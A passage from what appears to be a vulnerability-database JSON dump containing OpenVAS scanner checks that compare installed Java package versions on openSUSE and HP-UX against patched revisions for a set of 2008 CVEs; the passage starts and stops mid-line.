((res = isrpmvuln(pkg:\"java-1_6_0-sun-jdbc\", rpm:\"java-1_6_0-sun-jdbc~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-sun-plugin\", rpm:\"java-1_6_0-sun-plugin~1.6.0.u11~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835195", "href": "http://plugins.openvas.org/nasl.php?oid=835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_id(835195);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_summary(\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.11\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", 